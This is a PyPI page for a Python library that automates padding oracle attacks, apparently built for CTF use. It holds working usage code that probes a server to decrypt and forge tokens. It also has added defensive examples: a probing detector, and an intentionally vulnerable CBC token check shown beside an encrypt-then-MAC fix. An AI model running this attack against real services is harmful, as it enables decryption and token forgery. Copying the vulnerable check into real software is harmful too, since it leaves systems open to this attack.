| Field | Value |
|-------|-------|
| Name | padding-oracle |
| Version | 0.4.1 |
| home_page | |
| Summary | Threaded padding oracle automation. |
| upload_time | 2023-11-18 13:26:18 |
| maintainer | |
| docs_url | None |
| author | |
| requires_python | >=3.10 |
| license | |
| keywords | |
| VCS | |
| bugtrack_url | |
| requirements | pytest, cryptography |
| Travis-CI | No Travis. |
| coveralls test coverage | No coveralls. |

# Padding Oracle Automation in Python

This script automates padding oracle attacks in Python, offering efficient and threaded execution.
## Installation
You can install the script using one of these methods:
- **Via PyPI:**
```shell
pip3 install -U padding_oracle
```
- **Directly from GitHub:**
```shell
pip3 install -U git+https://github.com/djosix/padding_oracle.py.git
```
## Performance
The script's performance varies depending on the number of request threads. This was tested in a CTF web challenge:
| Request Threads | Time Taken |
|-----------------|-------------|
| 1 | 17m 43s |
| 4 | 5m 23s |
| 16 | 1m 20s |
| 64 | 56s |
## Usage
### Decryption
To decrypt a token such as the one in `https://example.com/api/?token=M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94%3D`, the script assumes that the token is vulnerable to a padding oracle attack. You supply an `oracle` function that submits a candidate ciphertext and reports whether the server accepted its padding.
```python
from padding_oracle import decrypt, base64_encode, base64_decode
import requests

sess = requests.Session()  # Uses connection pooling
url = 'https://example.com/api/'


def oracle(ciphertext: bytes):
    # Submit the candidate ciphertext and classify the server's response.
    response = sess.get(url, params={'token': base64_encode(ciphertext)})
    if 'failed' in response.text:
        return False  # Token decryption failed
    elif 'success' in response.text:
        return True
    else:
        raise RuntimeError('Unexpected behavior')


ciphertext = base64_decode('M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=')
assert len(ciphertext) % 16 == 0  # Must be a whole number of blocks

plaintext = decrypt(
    ciphertext,
    block_size=16,
    oracle=oracle,
    num_threads=16,
)
```
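Seen from the server side, the traffic this produces has a recognisable shape: the ciphertext block under attack stays fixed while the bytes in front of it change on every request, and nearly every request fails. The following detection sketch is an added example, not part of the project; the record layout `(client, token, marker)`, the thresholds and the sample traffic are assumptions constructed for illustration.

```python
import base64
from collections import defaultdict

BLOCK = 16  # matches block_size=16 in the usage above

def constructed_probe_log(client: str, n: int) -> list[tuple[str, str, str]]:
    """Constructed records shaped like oracle probing: fixed final block, varying prefix."""
    target = bytes(range(BLOCK))
    rows = []
    for i in range(n):
        token = base64.b64encode(i.to_bytes(BLOCK, 'big') + target).decode()
        rows.append((client, token, 'success' if i % 256 == 255 else 'failed'))
    return rows

def find_probing(records, min_variants=64, min_fail_ratio=0.9):
    """Flag (client, final block) pairs seen with many distinct prefixes and mostly failures."""
    stats = defaultdict(lambda: {'prefixes': set(), 'total': 0, 'failed': 0})
    for client, token_b64, marker in records:
        try:
            raw = base64.b64decode(token_b64, validate=True)
        except ValueError:
            continue  # not a well-formed token; leave it to other rules
        if len(raw) < 2 * BLOCK or len(raw) % BLOCK:
            continue
        entry = stats[(client, raw[-BLOCK:])]
        entry['prefixes'].add(raw[:-BLOCK])
        entry['total'] += 1
        entry['failed'] += marker == 'failed'
    alerts = []
    for (client, block), entry in stats.items():
        ratio = entry['failed'] / entry['total']
        if len(entry['prefixes']) >= min_variants and ratio >= min_fail_ratio:
            alerts.append({'client': client, 'fixed_block': block.hex(),
                           'variants': len(entry['prefixes']), 'fail_ratio': round(ratio, 3)})
    return alerts

# Constructed traffic: one ordinary client replaying its own token, one probing client.
NORMAL = [('198.51.100.20', 'M9I2K9mZxzRUvyMkFRebeQzrCaMta83eAE72lMxzg94=', 'success')] * 20
SAMPLE_LOG = NORMAL + constructed_probe_log('203.0.113.7', 512)

if __name__ == '__main__':
    for alert in find_probing(SAMPLE_LOG):
        print(alert)
```

Keying on the client address alone misses probing spread across many sources, so in practice the same grouping is also worth running on the fixed block by itself.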
### Encryption
Below is an example demonstrating how to encrypt arbitrary bytes. For a detailed understanding of the process, please refer to [this Pull Request](https://github.com/djosix/padding_oracle.py/pull/4).
```python
from padding_oracle import encrypt

# `oracle` is the function defined in the decryption example above.
ciphertext = encrypt(
    b'YourTextHere',
    block_size=16,
    oracle=oracle,
    num_threads=16,
)
```
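Both decryption and encryption through an oracle depend on the server decrypting unauthenticated ciphertext and answering differently for valid and invalid padding. The following added example (not the project's code) puts such a token check beside an encrypt-then-MAC version and measures how many distinct responses tampering can produce; the keys, function names and `user=alice` payload are constructed, and it uses the `cryptography` package listed in the requirements.

```python
import hashlib, hmac, os
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

ENC_KEY, MAC_KEY = os.urandom(16), os.urandom(32)  # constructed demo keys

def cbc_encrypt(plaintext: bytes) -> bytes:
    iv, padder = os.urandom(16), padding.PKCS7(128).padder()
    enc = Cipher(algorithms.AES(ENC_KEY), modes.CBC(iv)).encryptor()
    return iv + enc.update(padder.update(plaintext) + padder.finalize()) + enc.finalize()

def cbc_decrypt(token: bytes) -> bytes:
    dec = Cipher(algorithms.AES(ENC_KEY), modes.CBC(token[:16])).decryptor()
    unpadder = padding.PKCS7(128).unpadder()
    padded = dec.update(token[16:]) + dec.finalize()
    return unpadder.update(padded) + unpadder.finalize()  # ValueError on bad padding

def check_vulnerable(token: bytes) -> str:
    """Unauthenticated CBC: the response reveals whether the padding was valid."""
    try:
        cbc_decrypt(token)
        return 'success'
    except ValueError:
        return 'failed'

def issue_hardened(plaintext: bytes) -> bytes:
    body = cbc_encrypt(plaintext)
    return body + hmac.new(MAC_KEY, body, hashlib.sha256).digest()

def check_hardened(token: bytes) -> str:
    """Encrypt-then-MAC: verify the tag in constant time before any decryption."""
    body, tag = token[:-32], token[-32:]
    expected = hmac.new(MAC_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return 'failed'  # same answer for every kind of tampering
    cbc_decrypt(body)
    return 'success'

def responses_under_tampering(check, token: bytes, pos: int) -> set[str]:
    """Regression check: distinct responses when the byte at pos is changed to each other value."""
    seen = set()
    for delta in range(1, 256):
        mutated = bytearray(token)
        mutated[pos] ^= delta
        seen.add(check(bytes(mutated)))
    return seen
```

A token check is safe in this respect when `responses_under_tampering` returns a single response class for every byte position; making the error text uniform without authenticating the ciphertext leaves timing and other side channels open.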
### Customized Logging
Both `encrypt` and `decrypt` allow the user to inject a custom logger:
- **Disable Logging:**
```python
from padding_oracle import nop_logger

plaintext = decrypt(
    ...
    logger=nop_logger,
)
```
- **Selective Logging:**
```python
def logger(kind: str, message: str):
    # Print only error events and drop everything else.
    if kind in ('oracle_error', 'solve_block_error'):
        print(f'[{kind}] {message}')


plaintext = decrypt(
    ...
    logger=logger,
)
```
### Extras
The script also includes PHP-like encoding and decoding functions:
```python
from padding_oracle.encoding import urlencode, urldecode, base64_encode, base64_decode
```
### TODO
- [ ] Support more padding schemes
## License
This script is distributed under the MIT license.
Raw data
{
"_id": null,
"home_page": "",
"name": "padding-oracle",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.10",
"maintainer_email": "",
"keywords": "",
"author": "",
"author_email": "Yuankui Li <toregnerate@gmail.com>",
"download_url": "https://files.pythonhosted.org/packages/46/f4/7e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0/padding_oracle-0.4.1.tar.gz",
"platform": null,
"bugtrack_url": null,
"license": "",
"summary": "Threaded padding oracle automation.",
"version": "0.4.1",
"project_urls": {
"Bug Tracker": "https://github.com/djosix/padding_oracle.py/issues",
"Homepage": "https://github.com/djosix/padding_oracle.py"
},
"split_keywords": [],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "21f44dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47",
"md5": "4325e5e170987415fb6419b9472de9b4",
"sha256": "5642b4c016d4d424a7d5970d0c38f4dd7bfcf0cf367d02301083283167dde7fc"
},
"downloads": -1,
"filename": "padding_oracle-0.4.1-py3-none-any.whl",
"has_sig": false,
"md5_digest": "4325e5e170987415fb6419b9472de9b4",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.10",
"size": 10046,
"upload_time": "2023-11-18T13:26:17",
"upload_time_iso_8601": "2023-11-18T13:26:17.074645Z",
"url": "https://files.pythonhosted.org/packages/21/f4/4dd4b3d49e85f3589aeae071fa3759106b05b7c900c127f1e95e757d3b47/padding_oracle-0.4.1-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "46f47e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0",
"md5": "62b77a6b933d96710e78fa51cdac4755",
"sha256": "172ff1ad292d9a9bb779bbc0c24c8c0607e028bd4fa3e8d6b7fead5983dcf6e8"
},
"downloads": -1,
"filename": "padding_oracle-0.4.1.tar.gz",
"has_sig": false,
"md5_digest": "62b77a6b933d96710e78fa51cdac4755",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.10",
"size": 8471,
"upload_time": "2023-11-18T13:26:18",
"upload_time_iso_8601": "2023-11-18T13:26:18.532055Z",
"url": "https://files.pythonhosted.org/packages/46/f4/7e5ee1936f8af70b8368e87da09ba97ed54a2ad6a193f5e6d3ca0e3474f0/padding_oracle-0.4.1.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-11-18 13:26:18",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "djosix",
"github_project": "padding_oracle.py",
"travis_ci": false,
"coveralls": false,
"github_actions": true,
"requirements": [
{
"name": "pytest",
"specs": [
[
">=",
"7"
],
[
"<",
"8"
]
]
},
{
"name": "cryptography",
"specs": [
[
">=",
"36"
],
[
"<",
"37"
]
]
}
],
"lcname": "padding-oracle"
}